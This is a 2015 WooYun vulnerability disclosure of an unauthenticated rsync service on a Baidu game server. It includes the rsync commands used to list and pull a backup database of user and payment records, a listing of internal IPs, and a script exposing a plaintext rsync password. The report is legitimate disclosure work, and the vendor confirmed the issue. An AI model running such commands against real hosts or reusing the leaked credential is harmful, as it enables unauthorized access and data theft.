当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142737

漏洞标题:百度游戏一处rsync未授权访问可获取备份数据库

相关厂商:百度

漏洞作者: 路人甲

提交时间:2015-09-22 11:46

修复时间:2015-11-06 17:52

公开时间:2015-11-06 17:52

漏洞类型:未授权访问/权限绕过

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-22: 厂商已经确认,细节仅向厂商公开
2015-10-02: 细节向核心白帽子及相关领域专家公开
2015-10-12: 细节向普通白帽子公开
2015-10-22: 细节向实习白帽子公开
2015-11-06: 细节向公众公开

简要描述:

百度游戏一处rsync未授权访问可获取备份数据库

详细说明:

root@sScanner-node-3:~# rsync 180.76.19.138:: --port=8190
backup
log
root@sScanner-node-3:~# rsync 180.76.19.138::backup/ --port=8190
drwxr-xr-x 4,096 2015/08/13 06:00:57 .
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.10
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.11
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.110
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.118
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.165
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.172
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.174
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.175
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.179
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.183
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.184
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.190
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.191
drwxr-xr-x 4,096 2015/09/22 06:00:03 111.206.39.193
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.196
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.20
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.201
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.207
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.209
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.210
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.211
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.214
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.217
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.218
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.223
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.226
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.227
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.228
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.229
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.23
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.231
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.232
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.234
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.31
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.32
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.33
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.4
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.39.7
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.14
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.144
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.15
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.17
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.19
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.2
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.20
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.22
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.23
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.24
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.25
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.3
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.41
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.7
drwxr-xr-x 4,096 2015/09/22 06:00:02 111.206.40.8
drwxr-xr-x 4,096 2015/08/12 06:00:02 111.206.43.211
drwxr-xr-x 4,096 2015/08/12 06:00:02 111.206.43.223
drwxr-xr-x 4,096 2015/08/12 06:00:02 111.206.43.224
root@sScanner-node-3:~# rsync 180.76.19.138::backup/111.206.39.10/ --port=8190
drwxr-xr-x 4,096 2015/09/22 06:00:02 .
-rw-r--r-- 548,931,485 2015/09/22 06:00:37 backup.sql


导入backup.sql后,查看包括约1万用户名,但并不包含密码等个人信息,可游戏充值记录等数据。
对应游戏:

http://youxi.baidu.com/gjqt/


漏洞证明:

root@sScanner-node-3:~# rsync 180.76.19.138::log/rsync_log.sh ./ --port=8190
root@sScanner-node-3:~# cat rsync_log.sh
#!/bin/bash
#env RSYNC_PASSWORD=topsecret rsync -av --exclude-from="/home/data/rsync/log/exclude_tmp.txt" --port 8190 gjqt@b1.gjqt.baiduwebgame.com::log /home/data/rsync/log
env RSYNC_PASSWORD=topsecret rsync -avz --port 8190 gjqt@b1.gjqt.baiduwebgame.com::log /home/data/rsync/log

修复方案:

认证,禁止未授权访问

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-09-22 17:50

厂商回复:

感谢关注百度安全!

最新状态:

暂无


漏洞评价:

评论